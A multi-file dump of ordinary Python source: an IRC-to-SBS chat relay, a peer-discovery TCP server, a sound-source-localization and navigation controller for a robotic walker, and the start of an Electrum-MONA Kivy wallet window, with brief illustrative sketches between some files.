def irc_handle(self, line):
'''Parses a line of IRC protocol and calls the appropriate handler'''
matched = re.match(IRCRE, line)
nick, user, host, cmd, params, msg = matched.groups()
if hasattr(self, 'irc_on' + cmd): # Method lookup
handler = getattr(self, 'irc_on' + cmd)
handler(nick, user, host, cmd, (params or '').split(' '), msg)
else:
self.irc_sendUNKNOWNCOMMAND(self.nick, cmd, 'Unknown Command')
# ----- IRC Send Methods -----
def irc_send(self, message, prefix='', suffix=''):
'''Sends a line of IRC protocol, breaking into
IRC_MAX_BYTES sections as appropriate while
preserving utf-8 multibyte sequences'''
output = []
prefix = prefix.encode(self.config['encoding'])
suffix = suffix.encode(self.config['encoding'])
maxbytes = IRC_MAX_BYTES - len(b'\r\n') - len(prefix) - len(suffix)
for line in message.split('\r\n'):
for part in splitbytes(line, maxbytes, self.config['encoding']):
print(b'irc>' + prefix + part + suffix)
self.request.send(prefix + part + suffix + b'\r\n')
output.append(part)
return output
def irc_sendUNKNOWNCOMMAND(self, target, command, reason):
return self.irc_send(reason, ':{} 421 {} {} :'.format(
self.config['irc_name'], target, command))
def irc_sendNOMOTD(self, target, reason):
return self.irc_send(reason, ':{} 422 {} :'.format(
self.config['irc_name'], target))
def irc_sendWELCOME(self, target, message):
return self.irc_send(message, ':{} 001 {} :'.format(
self.config['irc_name'], target))
def irc_sendNOTICE(self, message, target=None):
return self.irc_send(message, ':{} NOTICE {} :'.format(
self.config['irc_name'], target or self.nick))
def irc_sendJOIN(self, nick, channel):
return self.irc_send(':{} JOIN {}'.format(nick, channel))
def irc_sendNAMREPLY(self, target, channel, nicks):
'''Takes a list of names and sends one or more RPL_NAMREPLY messages,
followed by a RPL_ENDOFNAMES message'''
prefix = ':{} 353 {} = {} :'.format(
self.config['irc_name'], target, channel)
maxbytes = IRC_MAX_BYTES - len(b'\r\n') - \
len(prefix.encode(self.config['encoding']))
while nicks:
for i in range(1, len(nicks)+1):
line = ' '.join(nicks[:i]).encode(self.config['encoding'])
if len(line) > maxbytes:
i -= 1
break
line = ' '.join(nicks[:i])
nicks = nicks[i:]
self.irc_send(line, prefix)
self.irc_send('End of NAMES list', ':{} 366 {} {} :'.format(
self.config['irc_name'], target, channel))
def irc_sendQUIT(self, source): # TODO: Allow quit message
return self.irc_send(':{} QUIT'.format(source))
def irc_sendPRIVMSG(self, source, target, message):
return self.irc_send(
message,
':{} PRIVMSG {} :'.format(source, target)
)
def irc_sendACTION(self, source, target, message):
return self.irc_send(
message,
':{} PRIVMSG {} :\x01ACTION '.format(source, target),
'\x01'
)
# ----- IRC Message Handlers -----
def irc_onPASS(self, nick, user, host, cmd, params, msg):
self.sbs_pass = params[0]
def irc_onNICK(self, nick, user, host, cmd, params, msg):
self.nick = params[0]
def irc_onCAP(self, nick, user, host, cmd, params, msg):
pass # TODO: Implement?
def irc_onUSER(self, nick, user, host, cmd, params, msg):
'''Initializes the SBS connection'''
# TODO: use the USER information for something
# TODO: better error handling
# TODO: start 30s activity ping
# TODO: figure out how to trigger initial message wave
# Initiate server-side IRC connection
# Make sure to join user to channels before the ws
# tries to send the nick lists for those channels
self.irc_channels = {}
self.irc_sendWELCOME(self.nick, 'Welcome {}!'.format(self.nick))
self.irc_sendNOMOTD(self.nick, 'ERR_NOMOTD')
# Get the user's ID and access token
r = requests.post(self.config['sbs_query'] + '/usercheck',
params={'username': self.nick})
self.sbs_uid = r.json()['result']
r = requests.post(self.config['sbs_query'] + '/chatauth', data={
'username': self.nick,
'password': hashlib.md5(self.sbs_pass.encode('utf-8')).hexdigest()
})
self.sbs_token = r.json()['result']
# Initiate the websocket connection to the SBS servers
self.sbs_used_ids = set()
self.sbs_nicks = {}
self.ws = websocket.WebSocketApp(
'ws://{}:{}/chatserver'.format(
self.config['sbs_host'], self.config['sbs_port']),
on_open = self.ws_open,
on_message = self.ws_message,
on_error = self.ws_error,
on_close = self.ws_close
)
thread = threading.Thread(target=self.ws.run_forever)
thread.daemon = True
thread.start()
def irc_onJOIN(self, nick, user, host, cmd, params, msg):
channel = params[0]
source = self.nick+'!'+str(self.sbs_uid)+'@'+self.config['sbs_host']
for channel in params[0].split(','):
if channel not in self.irc_channels:
self.irc_sendNOTICE(
'[ERROR] Unknown channel: {}'.format(channel))
continue
self.irc_sendJOIN(source, channel)
self.irc_sendNAMREPLY(
self.nick, channel, self.irc_channels[channel])
def irc_onPING(self, nick, user, host, cmd, params, msg):
self.irc_send('PONG {}'.format(params[0]))
def irc_onPRIVMSG(self, nick, user, host, cmd, params, msg):
if msg.startswith('\x01ACTION') and msg.endswith('\x01'):
msg = '/me ' + msg[len('\x01ACTION'):-len('\x01')].lstrip()
self.sbs_send({
'type': 'message',
'key': self.sbs_token,
'text': msg,
'tag': params[0][len(IRC_CHANPREFIX):]
})
# ----- WS Event Handlers -----
def ws_open(self, ws):
# Authenticate with the SBS chat server
self.sbs_send({
'type': 'bind',
'uid': self.sbs_uid,
'key': self.sbs_token
})
def ws_message(self, ws, framedata):
print('sbs<' + framedata)
frame = json.loads(framedata)
if hasattr(self, 'sbs_on' + frame['type']):
handler = getattr(self, 'sbs_on' + frame['type'])
handler(frame)
else:
self.irc_sendNOTICE('[ERROR] Unknown frame:')
self.irc_sendNOTICE(framedata)
def ws_error(self, ws, error):
raise Exception("Websocket Error: {}".format(error))
def ws_close(self, ws):
# TODO: Gracefully handle disconnect
print("CLOSING WEBSOCKET")
# ----- SBS Send Methods -----
def sbs_send(self, data):
data = json.dumps(data)
print('sbs>' + data)
self.ws.send(data)
# ----- SBS Event Handlers -----
def sbs_onuserList(self, frame):
self.sbs_userlist = frame
# TODO: support rooms properly
nicks = {user['username']: user for user in frame['users']}
# Diff the nick lists
newnicks = list(set(nicks) - set(self.sbs_nicks))
oldnicks = list(set(self.sbs_nicks) - set(nicks))
if self.nick in newnicks: # Initial channel join
for tag in self.config['tags'].split(','):
self.irc_channels[IRC_CHANPREFIX + tag] = list(nicks)
self.irc_onJOIN(None, None, None, # Join user to channel
'JOIN', [IRC_CHANPREFIX + tag], None)
else:
for tag in self.config['tags'].split(','):
for nick in newnicks:
self.irc_channels[IRC_CHANPREFIX + tag] = list(nicks)
self.irc_sendJOIN(self.sbs_getuser(nick, nicklist=nicks),
IRC_CHANPREFIX + tag)
# Handle absent nicks
for nick in oldnicks:
self.irc_sendQUIT(self.sbs_getuser(nick))
# Save new list for later comparison
self.sbs_nicks = nicks
def sbs_getuser(self, nick, nicklist=None):
if nicklist is None:
nicklist = self.sbs_nicks
if nick in nicklist:
uid = nicklist[nick]['uid']
else:
uid = 0 # TODO: Better handling
return '{}!{}@{}'.format(
nick,
uid,
self.config['sbs_host']
)
def sbs_onmessageList(self, frame):
# TODO: Handle case where user is not in userlist
# TODO: Handle timestamp mismatch (initial scrollback)
for message in frame['messages']:
if message['id'] in self.sbs_used_ids:
continue
self.sbs_used_ids.add(message['id'])
if message['username'] == self.nick:
continue
for line in message['message'].splitlines():
if message['encoding'] == 'draw':
try:
decoded = image_decode(line)
except: # TODO: More specific error
decoded = "[ERROR] Couldn't decode image!"
else:
decoded = html.unescape(line)
channel = IRC_CHANPREFIX + message['tag']
if channel not in self.irc_channels:
self.irc_onJOIN(None, None, None, 'JOIN', [channel], None)
self.irc_sendPRIVMSG(
self.sbs_getuser(message['username']),
channel,
decoded
)
def sbs_onmodule(self, frame):
# TODO: Better /me support
message = html.unescape(frame['message'])
if frame['module'] == 'fun':
split = message.split(' ', 1)
if split[0] not in self.sbs_nicks: # Not a /me action message
self.irc_sendNOTICE('[ERROR] Unknown fun module usage:')
self.irc_sendNOTICE(str(frame))
return
if split[0] == self.nick: # Outgoing message
return
self.irc_sendACTION(
self.sbs_getuser(split[0]),
IRC_CHANPREFIX + frame['tag'],
split[1]
)
else:
self.irc_sendNOTICE('[ERROR] Unknown module frame type:')
self.irc_sendNOTICE(str(frame))
def sbs_onresponse(self, frame):
if not frame['result']:
self.irc_sendNOTICE('[ERROR] Received false response:')
self.irc_sendNOTICE(str(frame))
return
# After initialization completes request initial chat logs
if frame['from'] == 'bind':
self.sbs_send({'type': 'request', 'request': 'messageList'})
def sbs_onsystem(self, frame):
message = html.unescape(frame['message'])
if 'subtype' not in frame:
self.irc_sendNOTICE('[ERROR] System frame missing subtype:')
self.irc_sendNOTICE(str(frame))
return
if frame['subtype'] in ('join', 'leave'):
return
self.irc_sendNOTICE(message)
class IRCRelay():
class TCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
def __init__(self, config_name):
print('Using config {}'.format(config_name))
config = configparser.ConfigParser()
config.read(['default.cfg', 'custom.cfg'], 'utf-8')
self.config = config[config_name]
class Handler(TCPHandler):
config = self.config
self.handler = Handler
def serve(self, daemon=False):
self.server = self.TCPServer(
(self.config['irc_addr'], int(self.config['irc_port'])),
self.handler)
print('Serving on {}:{}'.format(
self.config['irc_addr'], self.config['irc_port']))
thread = threading.Thread(target=self.server.serve_forever)
thread.daemon = daemon
thread.start()
# TODO: close server on exit
#self.server.shutdown()
#self.server.server_close()
if __name__ == '__main__':
if len(sys.argv) > 1:
config_name = sys.argv[1]
else:
config_name = 'DEFAULT'
irc = IRCRelay(config_name)
irc.serve()
|
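splitbytes() in relay.py enforces the IRC_MAX_BYTES limit on the encoded byte length while keeping multi-byte UTF-8 sequences intact. A small reimplementation for illustration only (the relay's own version counts down from maxbytes rather than from the string length):

def split_utf8(text, maxbytes):
    # yield encoded chunks of at most maxbytes bytes without cutting
    # a multi-byte UTF-8 sequence in half
    while text:
        cut = len(text)
        while len(text[:cut].encode('utf-8')) > maxbytes:
            cut -= 1
        yield text[:cut].encode('utf-8')
        text = text[cut:]

print(list(split_utf8('héllo', 3)))  # [b'h\xc3\xa9', b'llo'] - the 2-byte 'é' stays whole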
tcp_server.py
|
import socket
import logging
import threading
import time
from message_wrapper import *
logger = logging.getLogger('tcp_server')
logging.basicConfig(level=logging.INFO,format='%(asctime)s - %(message)s')
class TcpServer(object):
def __init__(self,port):
self.port = port
self.clients={}
self.peers = {}
def _addr_to_key(self,addr):
return addr[0] + ':' + str(addr[1])
def get_client(self,addr):
return self.clients.get(self._addr_to_key(addr))
def set_client(self,addr,client_info):
self.clients[self._addr_to_key(addr)] = client_info
def _client_handler(self,conn,client_addr,stop_event):
while(not stop_event.is_set()):
try:
data = conn.recv(1024)
if(len(data)==0):
time.sleep(1)
continue
command,msg = de_wapper(data)
logger.info('from client command: %d,%s', command,msg.__str__())
if(command==COMMAND_SIGN):
client_local_addr = msg['local_addr']
peer_key = msg['peer_key']
client_info = self.get_client(client_addr)
client_info['local_addr'] = client_local_addr
client_info['peer_key'] = peer_key
self.set_client(client_addr,client_info)
msg = {'public_addr':client_addr}
logger.info('message send to client:%s', msg.__str__())
conn.send(wapper(COMMAND_SIGN_ACK,msg))
elif(command==COMMAND_REQUEST_PEER):
peer_key = msg['peer_key']
peers = []
logger.info('begin to get peer for:%s:%d',client_addr[0],client_addr[1])
for key,item in self.clients.items():
if(item.get('peer_key') is not None and item.get('peer_key')==peer_key):
if(key!=self._addr_to_key(client_addr)):
peers.append(item.get('public_addr'))
#send peers to A
logger.info('send connect request to peer:%s',client_addr.__str__())
item['conn'].send(wapper(COMMAND_REQUEST_PEER_CLIENT,{'peers':client_addr}))
time.sleep(1)
if len(peers)>0: peers.append(())
msg={'peers':peers}
logger.info('message send to client:%s', msg.__str__())
conn.send(wapper(COMMAND_REQUEST_PEER_ACK,msg))
except socket.timeout:
conn.close()
break
def _accept(self,fsock,stop_event):
while(not stop_event.is_set()):
try:
conn,addr = fsock.accept()
except socket.timeout:
logger.info('timeout waiting for next connect')
continue
logger.info('connection from: %s:%d',addr[0],addr[1])
client_thread = threading.Thread(target=self._client_handler,args=(conn,addr,stop_event))
client_info = {}
client_info['thread'] = client_thread
client_info['public_addr'] = addr
client_info['conn'] = conn
self.set_client(addr,client_info)
client_thread.start()
def run(self):
self.stop_event = threading.Event()
self.fsock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.fsock.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
self.fsock.bind(('0.0.0.0',self.port))
self.fsock.listen()
self.fsock.settimeout(2)
logger.info('server started at %d', self.port)
self.run_thread = threading.Thread(target=self._accept,args=(self.fsock,self.stop_event,))
self.run_thread.start()
def stop(self):
self.stop_event.set()
time.sleep(1)
self.fsock.close()
if __name__ == '__main__':
server = TcpServer(12345)
server.run()
input()
logger.info('waiting connections to close')
server.stop()
|
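A minimal sketch of the accept-loop pattern used by TcpServer._accept() above: accept with a timeout, one handler thread per connection, and a shared Event checked to stop the loop. The handler argument here is illustrative only.

import socket
import threading

def accept_loop(listen_sock, stop_event, handler):
    listen_sock.settimeout(2)
    while not stop_event.is_set():
        try:
            conn, addr = listen_sock.accept()
        except socket.timeout:
            continue  # re-check stop_event instead of blocking forever
        threading.Thread(target=handler, args=(conn, addr, stop_event),
                         daemon=True).start()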
ssl_Process.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: swang
# @Contact: wang00sheng@gmail.com
# @Project Name: SmartWalker-master
# @File: ssl_loop.py
# @Time: 2022/01/02/20:34
# @Software: PyCharm
import os, sys
code_dir = os.path.dirname(os.path.abspath(__file__))
module_dir = os.path.dirname(code_dir)
project_dir = os.path.dirname(module_dir)
sys.path.extend([module_dir, project_dir])
# print('project_dir:', project_dir)
import time
import json
import numpy as np
from scipy import stats
import threading
from multiprocessing import Process, Value, Pipe, Queue
# general lib
from SoundSourceLocalization.mylib import utils
from SoundSourceLocalization.mylib.utils import standard_normalizaion
from SoundSourceLocalization.mylib.audiolib import normalize_single_channel_audio, audio_segmenter_4_numpy, \
audio_energy_ratio_over_threshold, audio_energy_over_threshold, audioread, audiowrite
# independent systems
from SoundSourceLocalization.SSL_Settings import *
import SoundSourceLocalization.SpeechEnhancement.code.ns_enhance_onnx as ns_enhance_onnx
from SoundSourceLocalization.SSL.code.ssl_audio_processor import *
from SoundSourceLocalization.SSL.code.ssl_feature_extractor import FeatureExtractor
from SoundSourceLocalization.SSL.code.ssl_DOA_model import DOA
from SoundSourceLocalization.SSL.code.ssl_turning import SSLturning
from SoundSourceLocalization.ReinforcementLearning.code.ssl_agent import Agent
from SoundSourceLocalization.ReinforcementLearning.code.ssl_env import MAP_ENV, ONLINE_MAP_ENV
# from SoundSourceLocalization.ReinforcementLearning.code.ssl_actor_critic import Actor, Critic
# # from Communication.Soundlocalization_socket_local import server_receive, server_transmit
# from Communication.Soundlocalization_socket import CLIENT
import Driver.ControlOdometryDriver as CD
class SSL(object):
def __init__(self, doDenoise=True, useCD=True, seg_len='256ms', isDebug=False):
print('-' * 20 + 'init SSL class' + '-' * 20)
self.isDebug = isDebug
self.doDrop = False
self.doDenoise = doDenoise # useless
self.useCD = useCD
self.frames = []
segment_para_set = {
'32ms' : {
'name' : '32ms',
'time_len' : 32 / 1000,
'threshold': 100,
'stepsize' : 0.5
},
'50ms' : {
'name' : '50ms',
'time_len' : 50 / 1000,
'threshold': 100,
'stepsize' : 0.5
},
'64ms' : {
'name' : '64ms',
'time_len' : 64 / 1000,
'threshold': 100,
'stepsize' : 0.5
},
'128ms': {
'name' : '128ms',
'time_len' : 128 / 1000,
'threshold': 200, # 100?
'stepsize' : 0.5
},
'256ms': {
'name' : '256ms',
'time_len' : 256. / 1000,
'threshold': 400,
'stepsize' : 256. / 1000 / 2
},
'1s' : {
'name' : '1s',
'time_len' : 1.,
'threshold': 800,
'stepsize' : 0.5
},
}
self.seg_para = segment_para_set[seg_len]
ref_audio, _ = audioread(os.path.abspath('./reference_wav.wav'))
self.ref_audio = normalize_single_channel_audio(ref_audio)
self.ref_audio_threshold = (self.ref_audio ** 2).sum() / len(self.ref_audio) / 500
del ref_audio, self.ref_audio,
# feature paras
self.num_gcc_bin = 128
self.num_mel_bin = 128
self.fft_len = utils.next_greater_power_of_2(self.seg_para['time_len'] * SAMPLE_RATE)
# SpeechEnhancement
print('-' * 20, 'Loading denoising model...', '-' * 20, )
self.denoise_model, _ = ns_enhance_onnx.load_onnx_model()
# DOA
print('-' * 20, 'Loading DOA model...', '-' * 20, )
num_action = 8
self.doa = DOA(model_dir=os.path.abspath('./model/EEGNet/ckpt'), fft_len=self.fft_len,
num_gcc_bin=self.num_gcc_bin, num_mel_bin=self.num_mel_bin, fs=SAMPLE_RATE, )
# RL
self.save_model_steps = 3
self.env = ONLINE_MAP_ENV()
self.save_ac_model = './model/ac_model'
self.agent = Agent(alpha=1., num_action=num_action, gamma=0.99, ac_model_dir=self.save_ac_model,
load_ac_model=True, save_model_steps=self.save_model_steps)
# Communication with Sensors
# self.client = CLIENT()
self.client = None
def drop_audio_per_seg_point(self, signal_segment, ):
'''
return a flag indicating whether an audio segment should be dropped, based on two criteria:
1. audio_energy_ratio
2. audio_energy_over_threshold
:param signal_segment:
:return: boolean flag
'''
signal_mean = signal_segment.mean(axis=0)
return not (audio_energy_over_threshold(signal_mean, threshold=self.ref_audio_threshold, ) and
audio_energy_ratio_over_threshold(signal_mean, fs=SAMPLE_RATE,
threshold=self.seg_para['threshold'], ))
def save_continuous_True(self, ini_list, num=3): # todo
pass
def drop_audio_clips(self, signal_segments, ):
# print('Number of segments before dropping: ', len(signal_segments))
audio_segments = []
drop_flag = []
for i in range(len(signal_segments)):
drop_flag.append(self.drop_audio_per_seg_point(signal_segments[i]))
if not drop_flag[-1]:
audio_segments.append(signal_segments[i])
else:
continue
# audio_segments.append([])
# print('Number of segments after dropping: ', len(audio_segments))
return np.array(audio_segments), drop_flag
def normalize_batch_audio(self, audio_batch):
'''
For every audio in a batch, normalize its channels respectively.
:param audio_batch:
:return:
'''
res_audio = []
for audio_channels in audio_batch:
norm_audio_channels = []
for audio in audio_channels:
norm_audio_channels.append(normalize_single_channel_audio(audio))
res_audio.append(norm_audio_channels)
return np.asarray(res_audio)
def denoise_batch_audio(self, audio_batch):
'''
For every audio in a batch, denoise its channels respectively.
:param audio_batch:
:return:
'''
res_audio = []
for audio_channels in audio_batch:
denoised_channels = []
for audio in audio_channels:
denoised_channels.append(
ns_enhance_onnx.denoise_nsnet2(audio=audio, fs=SAMPLE_RATE, model=self.denoise_model, ))
res_audio.append(denoised_channels)
return np.asarray(res_audio)
def preprocess_ini_signal(self, ini_signals):
'''
preprocess the received signals. Must be consistent with the dataset preprocessing method.
:param ini_signals:
:return:
'''
ini_signals = np.array(ini_signals, dtype=np.float64)
segs = np.array([audio_segmenter_4_numpy(signal, fs=SAMPLE_RATE, segment_len=self.seg_para['time_len'],
stepsize=self.seg_para['stepsize'], window='hann', padding=False,
pow_2=True) for signal in ini_signals]).transpose(1, 0, 2)
# norm_segs = segs
norm_segs = self.normalize_batch_audio(segs)
denoised_norm_segs = self.denoise_batch_audio(audio_batch=norm_segs)
if self.doDrop:
drop_denoised_norm_segs, drop_flag = self.drop_audio_clips(signal_segments=denoised_norm_segs)
else:
drop_denoised_norm_segs, drop_flag = denoised_norm_segs, [False, ] * len(denoised_norm_segs)
final_segments = self.normalize_batch_audio(drop_denoised_norm_segs)
return final_segments, drop_flag
def convert_owen_dir_2_digit(self, rad):
rad = rad if (rad >= 0) else (rad + 2 * np.pi)
degree = rad * 180 / np.pi
dir_digit = (int(degree + 22.5) // 45 + 8 - 2) % 8
print('degree: ', degree, 'dir_digit: ', dir_digit)
return dir_digit
def convert_owen_location_2_map(self, location):
location = [location[0] - 40, location[1] - 12]
return location
def convert_map_location_2_owen(self, location):
if np.allclose(location, [60, 425]): # 1
location = [120, 440]
elif np.allclose(location, [160, 320]): # 2
location = [196, 326]
elif np.allclose(location, [220, 15]): # 9
location = [246, 30]
elif np.allclose(location, [530, 220]): # 18
location = [560, 232]
else:
location = [location[0] + 40, location[1] + 12]
return location
def get_crt_position(self):
# message = '[320.5940246582031,201.4725799560547,-1.5714188814163208]'
while True:
message = self.client.receive()
if message != '':
break
print('End receiving: ', message)
message = json.loads(message)
location = self.convert_owen_location_2_map(message[0:2])
dir_digit = self.convert_owen_dir_2_digit(message[2])
return location, dir_digit
def send_crt_position(self, position, ):
(y, x) = self.convert_map_location_2_owen(position)
message = [int(y), int(x)]
print('Starting to send')
self.client.transmit(message=message)
print('End sending: ', message)
def get_audio_from_pipe(self, ):
''' For simplicity, only the most recent data is used, and it must be no more than 0.5 s from its send time.
In practice, the audio passed on by KWS for a single word lasts between 0.2 s and 0.5 s.
:return audio
'''
res = []
noData = True
while noData:
start_time = time.time()
while self.RECV_PIPE.poll():
msg = self.RECV_PIPE.recv()
(audio, y, prob, send_time) = msg
if abs(start_time - send_time) < KWS_TIMEOUT_SECONDS:
res.append(msg)
noData = False
print('SSL: walker data is received~', )
return res[-1][0]
def run(self, RECV_PIPE, control, ):
self.RECV_PIPE = RECV_PIPE
# initialize models
doa = self.doa
num_step = 0
# steps
while True:
# Detecting for walker_name
ini_signals = self.get_audio_from_pipe()
# preprocess initial audios
audio_segments, drop_flag = self.preprocess_ini_signal(ini_signals)
print('Number of preprocessed audio segments: ', len(audio_segments))
if not (len(audio_segments) > 0):
continue
num_step += 1
print('-' * 20, num_step, '-' * 20)
# calculate features
gcc_feature_batch = doa.extract_gcc_phat_4_batch(audio_segments)
gcc_feature_batch = np.mean(gcc_feature_batch, axis=0)[np.newaxis, :]
_, direction = doa.predict(gcc_feature_batch)
print("Producing action ...\n", 'Direction', direction)
### Hook into Owen's module and pass in aim_loca
if self.useCD:
direction = direction[0] * 45
SSLturning(control, direction)
control.speed = STEP_SIZE / FORWARD_SECONDS
control.radius = 0
control.omega = 0
time.sleep(FORWARD_SECONDS)
control.speed = 0
print("movement done.")
else:
pass
def run_RL(self, RECV_PIPE, control, ):
# initialize models
doa = self.doa
# configuration for RL
env = self.env
agent = self.agent
state, state_, = None, None,
node, node_ = None, None
action, action_ = None, None
reward, reward_ = None, None
done = False
num_step = 0
reward_history = []
position = None
# steps
while True:
time.sleep(0.5)
# Detecting for walker_name
if VoiceMenu.SSL_AUDIO_UPDATE:
ini_signals, y, prob = VoiceMenu.SSL_AUDIO
VoiceMenu.SSL_AUDIO_UPDATE = False
# save data
# ini_dir = os.path.join(WAV_PATH, save_dir, 'ini_signal')
# self.save_multi_channel_audio(ini_dir, ini_signals, fs=SAMPLE_RATE, norm=False, )
else:
continue
# preprocess initial audios
audio_segments, drop_flag = self.preprocess_ini_signal(ini_signals)
print('Number of preprocessed audio segments: ', len(audio_segments))
if not (len(audio_segments) > 0):
continue
num_step += 1
print('-' * 20, num_step, '-' * 20)
'''------------------------- Get feasible directions -----------------------------'''
# Get the real-time position
if self.isDebug:
# crt_position = input('please input current position and direction')
crt_position = '280 160 2'
crt_position = list(map(float, crt_position.split(' ')))
crt_loca, crt_abs_doa = crt_position[:2], int(crt_position[2])
else:
crt_loca, crt_abs_doa = self.get_crt_position()
print('crt_location: ', crt_loca, 'crt_abs_doa: ', crt_abs_doa)
# Get the feasible directions
crt_node = env.get_graph_node_idx(position=crt_loca)
node_ = crt_node
abs_availalbe_dircs = env.get_availalbe_dircs(node_idx=crt_node) # these directions should be in the walker's own frame, but the ones obtained are in absolute coordinates.
# print('availalbe_dircs: ', availalbe_dircs)
abs_dirc_mask = np.array(np.array(abs_availalbe_dircs) != None)
rela_dirc_mask = np.roll(abs_dirc_mask, shift=-crt_abs_doa)
# print('rela_dirc_mask: ', rela_dirc_mask)
dirc_digit = np.where(rela_dirc_mask)
print("crt_node: ", crt_node, 'avaliable_rela_dirc_digit: ', list(dirc_digit))
'''--------------------------- Reinforcement learning -------------------------------'''
# update state
if not self.isDebug:
gcc_feature_batch = doa.extract_gcc_phat_4_batch(audio_segments)
gcc_feature = np.mean(gcc_feature_batch, axis=0)
state_ = gcc_feature
else:
state_ = np.ones((1, 6, 128))
### Hook into reinforcement learning (learn)
# Before choosing an action, mask out the infeasible directions
action_ = agent.choose_action(state_, dirc_mask=rela_dirc_mask, sample=True)
# _, direction_cate, = doa.predict(gcc_feature)
# print(direction_prob)
print('Predicted action_: ', action_)
# print("Producing action ...\n", 'Direction', direction)
aim_node = env.next_id_from_rela_action(crt_node, action=action_, abs_doa=crt_abs_doa)
aim_loca = env.map.coordinates[aim_node]
position = aim_loca
print('aim_node: ', aim_node, 'aim_loca: ', aim_loca)
### Hook into Owen's module and pass in aim_loca
if self.useCD:
SSLturning(control, action_)
control.speed = STEP_SIZE / FORWARD_SECONDS
control.radius = 0
control.omega = 0
time.sleep(FORWARD_SECONDS)
control.speed = 0
print("movement done.")
else:
self.send_crt_position(aim_loca)
# Maintain `done` TODO
# Reinforcement update
if state is not None:
# state_, reward, done, info = env.step(action)
# reward = reward_history[-1]
agent.learn(state, action, reward, state_, done)
reward_ = float(input('Please input the reward for this action: '))
state = state_
node = node_
action = action_
reward = reward_
class SSL_Process(object):
def __init__(self, doDenoise=True, useCD=True, seg_len='256ms', isDebug=False, ):
super(SSL_Process, self).__init__()
self.seg_len = seg_len
self.doDenoise = doDenoise
self.useCD = useCD
self.isDebug = isDebug
def run(self, RECV_PIPE, left_right):
cd = CD.ControlDriver(left_right=left_right) if self.useCD else ''
if self.useCD:
cd_thread = threading.Thread(target=cd.control_part, args=())
cd_thread.start()
ssl = SSL(seg_len=self.seg_len, doDenoise=self.doDenoise, useCD=self.useCD, isDebug=self.isDebug, )
ssl.run(RECV_PIPE, cd, )
|
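A hedged sketch of how SSL_Process.run() above could be wired up: a one-way multiprocessing Pipe whose read end is handed to the SSL process, while a keyword-spotting producer pushes (audio, label, prob, send_time) tuples into the write end, matching what get_audio_from_pipe() expects. The 'L' wheel-layout argument and the producer side are assumptions.

from multiprocessing import Pipe, Process

if __name__ == '__main__':
    recv_pipe, send_pipe = Pipe(duplex=False)
    ssl_proc = SSL_Process(doDenoise=True, useCD=False, isDebug=True)
    p = Process(target=ssl_proc.run, args=(recv_pipe, 'L'))
    p.start()
    # a KWS producer would push tuples shaped like get_audio_from_pipe() expects:
    # send_pipe.send((audio, label, prob, time.time()))
    p.join()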
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import asyncio
from typing import TYPE_CHECKING, Optional, Union, Callable, Sequence
from electrum_mona.storage import WalletStorage, StorageReadWriteError
from electrum_mona.wallet_db import WalletDB
from electrum_mona.wallet import Wallet, InternalAddressCorruption, Abstract_Wallet
from electrum_mona.wallet import check_password_for_directory, update_password_for_directory
from electrum_mona.plugin import run_hook
from electrum_mona import util
from electrum_mona.util import (profiler, InvalidPassword, send_exception_to_crash_reporter,
format_satoshis, format_satoshis_plain, format_fee_satoshis,
maybe_extract_bolt11_invoice)
from electrum_mona.invoices import PR_PAID, PR_FAILED
from electrum_mona import blockchain
from electrum_mona.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum_mona.interface import PREFERRED_NETWORK_PROTOCOL, ServerAddr
from electrum_mona.logging import Logger
from .i18n import _
from . import KIVY_GUI_PATH
from kivy.app import App
from kivy.core.window import Window
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
from .uix.dialogs.password_dialog import OpenWalletDialog, ChangePasswordDialog, PincodeDialog
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_mona.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_mona.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_mona.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_mona.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
from .uix.dialogs.question import Question
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
# register widget cache for keeping memory down; timeout is set to forever
# to cache the data
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_mona.gui.kivy.uix.screens')
# Register fonts; without this you won't be able to use bold/italic
# inside markup.
from kivy.core.text import Label
Label.register(
'Roboto',
KIVY_GUI_PATH + '/data/fonts/Roboto.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto-Bold.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto-Bold.ttf',
)
from electrum_mona.util import (NoDynamicFeeEstimates, NotEnoughFunds,
BITCOIN_BIP21_URI_SCHEME, LIGHTNING_URI_SCHEME,
UserFacingException)
from .uix.dialogs.lightning_open_channel import LightningOpenChannelDialog
from .uix.dialogs.lightning_channels import LightningChannelsDialog, SwapDialog
if TYPE_CHECKING:
from . import ElectrumGui
from electrum_mona.simple_config import SimpleConfig
from electrum_mona.plugin import Plugins
from electrum_mona.paymentrequest import PaymentRequest
class ElectrumWindow(App, Logger):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
lightning_gossip_num_peers = NumericProperty(0)
lightning_gossip_num_nodes = NumericProperty(0)
lightning_gossip_num_channels = NumericProperty(0)
lightning_gossip_num_queries = NumericProperty(0)
